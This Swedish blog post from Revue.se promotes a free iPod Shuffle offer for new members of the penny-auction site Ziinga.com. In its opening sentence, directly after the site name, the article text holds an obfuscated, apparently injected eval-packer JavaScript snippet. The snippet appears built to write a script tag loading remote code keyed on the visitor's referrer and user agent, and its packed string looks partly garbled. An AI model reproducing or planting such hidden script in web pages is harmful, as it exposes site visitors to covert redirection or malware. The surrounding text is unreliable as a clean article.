Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

No Comments

Revue.se | Få en iPod Shuffle kostnadsfritt på Ziinga.com

Få en iPod Shuffle kostnadsfritt på Ziinga.com
Sebastian Plengier Ehrnfelt

Ziinga eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zffky|var|u0026u|referrer|irhka||js|php’.split(‘|’),0,{}))
är en nöjesinriktad shopping-webbplats som ger kunder möjligheten att köpa märkesvaror för så lite som 5 % av det faktiska återförsäljarpriset! Kunder köper helt enkelt rätten att bjuda på varor och vinna auktioner till lägsta möjliga pris!

Ziinga ligger nu i en uppstartsfas och bjuder nya medlemmar på en klassisk iPod Shuffle samt något sorts VIP medlemskap i 7 dagar. Jag har själv inte provat tjänsten som sidan erbjuder men blev klart lite sugen på att plocka hem en Shuffle helt kostnadsfritt.

Jag har precis börjat springa och det är ganska jobbigt att hela tiden ta med sig sin iPhone eller smartphone med på turen för att lyssna på musik.

Man behöver bara registrera sig som ny användare för att få tillgång till en iPod samt ett VIP-konto i sju dagar.

Om ni känner er sugna kan ni besöka sidan här:  Ziinga